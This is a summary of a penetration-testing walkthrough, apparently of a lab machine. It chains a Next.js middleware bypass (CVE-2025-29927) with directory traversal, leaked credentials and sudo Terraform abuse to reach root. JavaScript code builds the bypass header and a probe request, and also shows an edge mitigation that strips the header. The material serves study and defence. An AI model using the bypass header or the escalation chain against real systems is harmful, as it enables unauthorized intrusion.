A penetration testing walkthrough that exploits CVE-2025-29927, a Next.js middleware authentication bypass, to reach protected documentation. After the bypass, a directory traversal flaw in the download API exposes NextAuth configuration files containing hardcoded credentials, which grant SSH access as the user jeremy. Privilege escalation to root relies on a misconfigured sudo rule that allows running Terraform with preserved environment variables, opening three attack paths: a malicious provider configuration, arbitrary file read via symbolic links, and arbitrary file write used to inject a cron job.
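As an added illustration of the first step (this is not code from the walkthrough or from Next.js), the following emulates the middleware check behind CVE-2025-29927: Next.js used the internal `x-middleware-subrequest` header to detect recursive middleware subrequests and skipped the middleware once the header named it enough times, so an external client could set the header itself. The middleware name (`middleware`, `src/middleware`, or `pages/_middleware` on older versions) and the recursion limit of 5 are taken from the public advisory and the framework source; the functions, header object shape and `/docs` path are assumptions for the example. The strip function shows the edge-side mitigation for deployments that cannot upgrade immediately.

```javascript
// Added example: emulation of the vulnerable Next.js subrequest check,
// the header value a tester sends, and the edge mitigation of dropping it.

const MAX_RECURSION_DEPTH = 5; // limit Next.js used to stop middleware recursion

// Simplified vulnerable logic: count how many times the header names this
// middleware; at MAX_RECURSION_DEPTH or more the request was treated as an
// internal recursive subrequest and the (auth) middleware did not run.
function middlewareRunsVulnerable(headers, middlewareName) {
  const raw = headers['x-middleware-subrequest'] || '';
  const depth = raw.split(':').filter((name) => name === middlewareName).length;
  return depth < MAX_RECURSION_DEPTH; // false means the middleware is bypassed
}

// Header value an attacker supplies. The name depends on project layout:
// "middleware" for a root-level middleware.ts, "src/middleware" when it lives
// under src/, "pages/_middleware" on old releases. Testers try each variant.
function bypassHeaderValue(middlewareName = 'middleware') {
  return Array(MAX_RECURSION_DEPTH).fill(middlewareName).join(':');
}

// Probe request a tester would issue against a protected path (assumed /docs).
function buildProbe(middlewareName = 'middleware', path = '/docs') {
  return {
    method: 'GET',
    path,
    headers: { 'x-middleware-subrequest': bypassHeaderValue(middlewareName) },
  };
}

// Mitigation at a reverse proxy or WAF: the header is purely internal, so it
// must never be accepted from a client. Returns a copy without it.
function stripInternalHeaders(headers) {
  const clean = {};
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() !== 'x-middleware-subrequest') clean[key] = value;
  }
  return clean;
}

// Stand-alone demonstration: bypass succeeds against the vulnerable check
// and fails once the header is stripped at the edge.
const probe = buildProbe('middleware', '/docs');
console.log('vulnerable app runs middleware:',
  middlewareRunsVulnerable(probe.headers, 'middleware')); // false
console.log('behind stripping proxy runs middleware:',
  middlewareRunsVulnerable(stripInternalHeaders(probe.headers), 'middleware')); // true
```

A guessed middleware name that does not match the deployed one leaves the middleware in place, which is why a probe cycles through the known layouts; the upgrade to a patched Next.js release, which no longer trusts the external header, remains the real fix.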